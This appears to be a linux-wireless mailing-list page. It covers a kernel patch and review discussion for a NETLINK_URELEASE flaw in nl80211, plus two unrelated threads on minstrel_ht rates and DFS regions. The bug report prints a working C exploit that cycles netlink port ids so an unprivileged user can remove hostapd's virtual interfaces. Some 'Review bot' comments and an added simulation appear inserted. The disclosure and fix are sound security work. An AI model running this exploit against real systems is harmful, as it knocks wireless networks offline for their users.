[PATCH] NETLINK_URELEASE non-bound socket problem
Currently, any non-privileged user can create a netlink socket with a port_id equal to the port_id used by hostapd to create wireless network interfaces on-the-fly when more than one BSS is configured. When such a socket is closed, nl80211 will receive the socket release notification and such virtual interfaces will be removed while hostapd is still running.

This patch introduces two additional checks to correct the problem:

1) Do not send the netlink socket release notification when the socket is not bound.
2) Check the protocol number in the nl80211 netlink socket release notification handler.

Signed-off-by: Dmitry Ivanov --- net/netlink/af_netlink.c | 2 +- net/wireless/nl80211.c | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c index 215fc08..330ebd6 100644 --- a/net/netlink/af_netlink.c +++ b/net/netlink/af_netlink.c @@ -688,7 +688,7 @@ static int netlink_release(struct socket *sock) skb_queue_purge(&sk->sk_write_queue); -if (nlk->portid) { +if (nlk->portid && nlk->bound) { struct netlink_notify n = { .net = sock_net(sk), .protocol = sk->sk_protocol, diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c index 98c9242..056a730 100644 --- a/net/wireless/nl80211.c +++ b/net/wireless/nl80211.c @@ -13216,7 +13216,7 @@ static int nl80211_netlink_notify(struct notifier_block * nb, struct wireless_dev *wdev; struct cfg80211_beacon_registration *reg, *tmp; -if (state != NETLINK_URELEASE) +if (state != NETLINK_URELEASE || notify->protocol != NETLINK_GENERIC) return NOTIFY_DONE; rcu_read_lock(); -- 2.1.4

-- To unsubscribe from this list: send the line "unsubscribe linux-wireless" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
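Review bot: in the af_netlink.c hunk, `if (nlk->portid && nlk->bound) {` keeps a test that the new condition makes redundant: given how the flag is set, a socket only becomes bound after a non-zero port id has been assigned to it (explicit bind or autobind), so `nlk->bound` alone already implies `nlk->portid != 0`. Either simplify to `if (nlk->bound) {` or keep both and say in the commit message that `bound` is the check that matters. The commit message should also state that this changes what every NETLINK_URELEASE listener sees (nfnetlink and NFC, per the discussion), not only nl80211: release events for sockets whose bind() failed now silently disappear for all of them, which is the intended fix for the same bug there.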
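Review bot: the nl80211.c hunk's `notify->protocol != NETLINK_GENERIC` filter needs its rationale in the commit message, since point 2 only says "check protocol number": port ids are only unique within one netlink protocol, so without this test a NETLINK_ROUTE socket that legitimately bound port id N and then closed would tear down the interfaces of the generic-netlink socket holding the same N. The other NETLINK_URELEASE users named in the thread (nfnetlink, NFC) lack the same filter and should get it in a follow-up. A Cc: stable tag is warranted as well: the unbound-socket check alone turns an unprivileged local interface teardown into a no-op on every supported kernel.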
Re: NETLINK_URELEASE non-bound socket problem (was: [PATCH] Fix local DoS in cfg80211 subsystem)
Hi Johannes!

I will prepare a patch which does not send NETLINK_URELEASE for unbound sockets as you suggest. But I think the protocol check in nl80211 is still needed because port_id is unique per-protocol.

On Tue, Apr 5, 2016 at 12:56 PM, Johannes Berg wrote:
> Hi Dmitrijs,
>
> Thanks for reporting this problem.
>
>> The patch below corrects this problem in kernel space.
>
> I don't think that this is correct, there are four more users of
> NETLINK_URELEASE (nfnetlink, NFC), and afaict all of them have the same
> bug as nl80211.
>
> Rather than fix all of them, I think we should simply not report
> NETLINK_URELEASE for netlink sockets that weren't bound; if any user
> comes up that requires them later we could add a new event instead.
>
> I can't find what commit introduced this code, it goes back before git
> history, so I don't have the commit log. Maybe it was done for
> nfnetlink log/queue? Certainly both nl80211 and NFC are much newer.
>
>> Also, it is
>> recommended to ensure that user-space applications are not using
>> user-supplied port_id for netlink sockets (which is default in
>> libnl-tiny for example).
>
> This I think we should remove from the commit log - it's misleading and
> there's no point.
>
> johannes
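To make the two checks discussed in this thread concrete (do not raise NETLINK_URELEASE for a socket whose bind() failed, and have nl80211 ignore releases from other netlink protocols because port ids are only unique per protocol), here is a small user-space model of the release path. This is an added example, not kernel code and not part of any message in the thread: the per-protocol port-id table, the notifier call and nl80211's handler are reimplemented in miniature, and the scenario (hostapd on NETLINK_GENERIC port id 4242 owning wlan0-1, a second socket on NETLINK_GENERIC or NETLINK_ROUTE asking for the same id) is constructed. It assumes the precondition stated in the bug report, that a failed bind() leaves the requested port id on the socket with the bound flag still false.

```c
/* Added example, not kernel code: user-space model of netlink_release()'s
 * NETLINK_URELEASE event and nl80211's handler, with/without the two checks. */
#include <errno.h>
#include <stdbool.h>
#include <string.h>

#define NETLINK_ROUTE   0
#define NETLINK_GENERIC 16
#define MAX_SOCKS       8
#define MAX_WDEVS       4

struct nl_sock { bool in_use; int protocol; unsigned portid; bool bound; };
struct netlink_notify { int protocol; unsigned portid; };

static struct nl_sock socks[MAX_SOCKS];
/* virtual interfaces (e.g. wlan0-1), keyed by creator's port id; 0 = none */
static unsigned wdev_owner[MAX_WDEVS];

static int sim_socket(int protocol)
{
    int i = 0;
    while (i < MAX_SOCKS && socks[i].in_use) i++;
    if (i == MAX_SOCKS) return -1;
    socks[i] = (struct nl_sock){ .in_use = true, .protocol = protocol };
    return i;
}

/* Stand-in for the per-protocol nl_table: only a fully bound socket on the
 * same protocol owns a port id. */
static bool portid_taken(int protocol, unsigned portid)
{
    for (int i = 0; i < MAX_SOCKS; i++)
        if (socks[i].in_use && socks[i].bound &&
            socks[i].protocol == protocol && socks[i].portid == portid)
            return true;
    return false;
}

/* Assumed precondition from the report: the port id is stored before the
 * insert, so a clash returns -EADDRINUSE but leaves the id behind, unbound. */
static int sim_bind(int sk, unsigned portid)
{
    socks[sk].portid = portid;
    if (portid_taken(socks[sk].protocol, portid))
        return -EADDRINUSE;
    socks[sk].bound = true;
    return 0;
}

/* nl80211_netlink_notify(): tear down interfaces owned by the released id;
 * with check_protocol set, events from other netlink protocols are ignored. */
static int nl80211_netlink_notify(const struct netlink_notify *n, bool check_protocol)
{
    int removed = 0;
    if (check_protocol && n->protocol != NETLINK_GENERIC)
        return 0;
    for (int i = 0; i < MAX_WDEVS; i++)
        if (wdev_owner[i] && wdev_owner[i] == n->portid) {
            wdev_owner[i] = 0;
            removed++;
        }
    return removed;
}

/* netlink_release(): 'patched' = notify only bound sockets and let nl80211
 * filter on NETLINK_GENERIC. Returns the number of interfaces removed. */
static int sim_close(int sk, bool patched)
{
    struct nl_sock *s = &socks[sk];
    bool notify = patched ? (s->portid && s->bound) : (s->portid != 0);
    int removed = 0;
    if (notify) {
        struct netlink_notify n = { .protocol = s->protocol, .portid = s->portid };
        removed = nl80211_netlink_notify(&n, patched);
    }
    memset(s, 0, sizeof *s);
    return removed;
}

/* Constructed state: hostapd holds NETLINK_GENERIC port id 4242, owns wlan0-1. */
static void setup_hostapd(void)
{
    memset(socks, 0, sizeof socks);
    memset(wdev_owner, 0, sizeof wdev_owner);
    sim_bind(sim_socket(NETLINK_GENERIC), 4242);
    wdev_owner[0] = 4242;
}

/* A second socket on 'protocol' asks for hostapd's port id 4242 and is then
 * closed. On NETLINK_GENERIC the bind fails (the report's exploit); on
 * NETLINK_ROUTE it succeeds, since port ids are only unique per protocol.
 * Returns 1 if wlan0-1 survives the close, 0 if it was torn down. */
static int scenario(int protocol, bool patched)
{
    setup_hostapd();
    int sk = sim_socket(protocol);
    int rc = sim_bind(sk, 4242);
    if ((protocol == NETLINK_GENERIC) != (rc == -EADDRINUSE))
        return -1;                       /* model broke: unexpected bind result */
    sim_close(sk, patched);
    return wdev_owner[0] ? 1 : 0;
}
```

Unpatched, both scenarios tear down wlan0-1: the failed-bind socket because its port id was still set at close, the NETLINK_ROUTE socket because nl80211 never looked at the protocol. With both checks the interface survives in both cases, which is why the reply above keeps the protocol check even once unbound sockets no longer generate the event.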
[PATCH] Fix local DoS in cfg80211 subsystem
When hostapd is configured with more than one BSS and daemonized, a subsequent call to any tool like "iw" which opens and then closes a netlink socket may suddenly remove virtual interfaces created by hostapd (such as wlan0-1). In fact, any non-privileged user can create a netlink socket with the same port_id as used by hostapd (port_id is equal to the pid before daemonization). Although bind() will fail in that case, the nl80211 subsystem will receive the notification and remove interfaces.

Here is a simple exploit:

#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>

int main()
{
    unsigned int port_id;
    int sock_fd;
    int bind_rv;
    struct sockaddr_nl src_addr;

    /* Drop root privileges so the bind() attempts run as an ordinary user.
     * The group is dropped first: setgid() is no longer permitted once the
     * process has given up root with setuid(). */
    if(!getuid()) {
        if(setgid(1234)) {
            perror("Cannot drop root privileges - GID");
            return -1;
        }
        if(setuid(1234)) {
            perror("Cannot drop root privileges - UID");
            return -1;
        }
    }

    /* Try every port_id in turn: bind() fails where the id is already taken
     * (for example by hostapd), yet close() still triggers NETLINK_URELEASE. */
    for(port_id = 0; port_id < 65536; port_id++) {
        sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_GENERIC);
        if(sock_fd < 0) {
            return -1;
        }
        memset(&src_addr, 0, sizeof(src_addr));
        src_addr.nl_family = AF_NETLINK;
        src_addr.nl_pid = port_id;
        bind_rv = bind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr));
        if(bind_rv) {
            fprintf(stderr, "Bind failed for port_id %u: %s\n", port_id, strerror(errno));
        }
        close(sock_fd);
    }
    return 0;
}

The patch below corrects this problem in kernel space. Also, it is recommended to ensure that user-space applications are not using user-supplied port_id for netlink sockets (which is the default in libnl-tiny for example).

Signed-off-by: Dmitry Ivanov --- include/linux/netlink.h | 1 + net/netlink/af_netlink.c | 1 + net/wireless/nl80211.c | 4 +++- 3 files changed, 5 insertions(+), 1 deletion(-) diff --git a/include/linux/netlink.h b/include/linux/netlink.h index da14ab6..4a13b3c 100644 --- a/include/linux/netlink.h +++ b/include/linux/netlink.h @@ -138,6 +138,7 @@ struct netlink_notify { struct net *net; u32 portid; int protocol; +bool bound; }; struct nlmsghdr * 
diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c index 215fc08..0640864 100644 --- a/net/netlink/af_netlink.c +++ b/net/netlink/af_netlink.c @@ -693,6 +693,7 @@ static int netlink_release(struct socket *sock) .net = sock_net(sk), .protocol = sk->sk_protocol, .portid = nlk->portid, +.bound = nlk->bound, }; atomic_notifier_call_chain(&netlink_chain, NETLINK_URELEASE, &n); diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c index 98c9242..3099200 100644 --- a/net/wireless/nl80211.c +++ b/net/wireless/nl80211.c @@ -13216,7 +13216,9 @@ static int nl80211_netlink_notify(struct notifier_block * nb, struct wireless_dev *wdev; struct cfg80211_beacon_registration *reg, *tmp; -if (state != NETLINK_URELEASE) +if (state != NETLINK_URELEASE || +notify->protocol != NETLINK_GENERIC || +!notify->bound) return NOTIFY_DONE; rcu_read_lock(); -- 2.1.4
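Review bot: the include/linux/netlink.h hunk adds `+bool bound;` to struct netlink_notify only so that each listener can discard the event itself; as the reply in this thread already notes, every other NETLINK_URELEASE consumer (nfnetlink, NFC) would then need its own `!notify->bound` test, and any that omits it keeps the bug. Drop the new field and suppress the notification at its source in netlink_release() instead, which fixes all listeners at once without changing the public struct.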
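Review bot: the af_netlink.c hunk copies `.bound = nlk->bound,` into the notification but still calls atomic_notifier_call_chain() for a socket whose bind() failed; the cheaper and safer change is to condition the call itself on `nlk->bound` (the existing `if (nlk->portid)` above this hunk is where the test belongs), so that no listener ever sees a release for an unbound socket.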
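Review bot: the nl80211.c hunk mixes two checks of different scope in one condition: `+!notify->bound` is a core netlink concern and should go away once netlink_release() stops reporting unbound sockets, whereas `+notify->protocol != NETLINK_GENERIC ||` is the part that genuinely belongs in this handler, because port ids are only unique within one protocol and a NETLINK_ROUTE socket can legitimately hold the same id as hostapd's generic-netlink socket. Keep the protocol check and explain it in the commit message. The commit message's advice about not using user-supplied port ids in user space should be dropped, as requested in the reply: the kernel has to be correct for whatever port id a process asks for.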
Regression in minstrel_ht vs minstrel?
Hi!

While investigating a case of intermittent extreme packet loss, I've found that the minstrel_ht algo has one possible regression compared to the non-HT version of minstrel. It does not add the lowest rate to the last element of the rate table array.

Minstrel:

    /* Use lowest rate last */
    ratetbl->rate[i].idx = mi->lowest_rix;
    ratetbl->rate[i].count = mp->max_retry;
    ratetbl->rate[i].count_cts = mp->max_retry;
    ratetbl->rate[i].count_rts = mp->max_retry;

Minstrel HT:

    rates->rate[i].idx = -1;

This difference can be easily patched. I have had two otherwise identical ath9k-based stations under test for the last two days, sitting in the same noisy environment. So far, the patched one seems to be more robust.

Is this difference an intentional design decision, or should I submit the patch?
DFS region is not set for Australia. Channel 52 and above is unusable.
Hello!

In the latest regdb, there are four countries which have DFS channels but the DFS region is not set:

00 (World regulatory domain)
AD (Andorra)
AU (Australia)
HK (Hong Kong)

For example:

country AU:
	(2402 - 2482 @ 40), (20)
	(5170 - 5250 @ 80), (17), AUTO-BW
	(5250 - 5330 @ 80), (24), DFS, AUTO-BW
	(5490 - 5710 @ 160), (24), DFS
	(5735 - 5835 @ 80), (30)

However, cfg80211 has had an explicit check for this condition since revision 55f7435c18. Because of this, I cannot use channel 52 and above when the country code is set to AU. Hostapd receives error code -EINVAL from the kernel after NL80211_CMD_RADAR_DETECT and aborts its initialization sequence.

I have a couple of questions regarding this issue:

1) Has anyone else noticed this too?
2) Which of these three components is wrong - regdb, cfg80211 or hostapd?